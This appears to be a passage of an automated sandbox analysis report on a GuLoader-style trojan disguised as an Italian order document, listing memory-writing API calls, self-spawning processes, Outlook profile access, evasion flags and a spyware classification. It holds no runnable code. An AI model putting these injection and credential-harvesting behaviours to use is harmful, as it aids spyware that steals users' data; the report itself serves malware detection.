        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278327
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227732E
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227871A
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276768
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278775
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276770
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227CFA2
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227BFB4
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022773B2
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276BBD
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277FB9
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C386
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276F85
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B785
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227CFE1
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02275FF4
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022757CF
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022787CE
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227ABD4
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022763DF
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022763DD
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02275822
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D02D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277037
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276831
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02275802
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C016
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D06E
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278877
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B87F
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227BC79
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276C43
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022774A5
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C09D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022770E1
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B4E9
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022768E9
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276CF4
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022788C6
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022764C8
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D0DB
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B927
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B525
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B523
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D12E
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C114
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276D6F
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277577
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D171
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276D7C
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276D4E
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227895F
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B5A3
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022769AB
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022725B8
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278D8E
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C192
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227719D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B1EB
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D1EB
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276DF2
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278DD3
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022782FF NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227CB17 NtProtectVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277625 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227622C NtWriteVirtualMemory,LoadLibraryA,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276A38 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227CAAA NtProtectVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227768F NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227728D NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276AE4 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276ED6 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278327 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227732E NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276770 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277754 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022773B2 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276BBD NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276F85 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022783C3 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277037 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276831 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276C43 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022774A5 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278494 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022770E1 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022768E9 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276CF4 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276D6F NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277577 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276D7C NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276D4E NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022769AB NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227719D NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B1EB NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276DF2 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess Stats: CPU usage > 98%
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHYDROCHELIDON.exe vs ORDINE + DDT A.M.F SpA.exe
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000000.238030340785.0000000000426000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHYDROCHELIDON.exe vs ORDINE + DDT A.M.F SpA.exe
        Source: ORDINE + DDT A.M.F SpA.exeBinary or memory string: OriginalFilenameHYDROCHELIDON.exe vs ORDINE + DDT A.M.F SpA.exe
        Source: ORDINE + DDT A.M.F SpA.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: ORDINE + DDT A.M.F SpA.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeSection loaded: edgegdi.dll
        Source: ORDINE + DDT A.M.F SpA.exeStatic PE information: invalid certificate
        Source: ORDINE + DDT A.M.F SpA.exeVirustotal: Detection: 21%
        Source: ORDINE + DDT A.M.F SpA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: unknownProcess created: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess created: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess created: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6ebJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile created: C:\Users\user\AppData\Local\Temp\~DFBA8B24485FEA2BF0.TMPJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/5@3/2
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeMutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

        Data Obfuscation:

        barindex
        Yara detected GuLoaderShow sources
        Source: Yara matchFile source: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.238036448865.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_004078D8 push ds; ret
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_00407B43 push es; ret
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_00409392 push esi; retf
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_004083A0 pushad ; ret
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02272A15 push edx; ret
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02272A4D push edx; ret
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022742FC push eax; retn 0010h
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02271BFE push ss; ret
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022747F8 push eax; retn 0010h
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B4E9 push edx; retn 9253h
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02271CCE push ss; ret
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227AD25 push FFFFFFB9h; retf
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227AD2D push FFFFFFB9h; retf
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02275183 push esp; retf
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02271D80 push ss; ret
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022729F4 push edx; ret
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOX
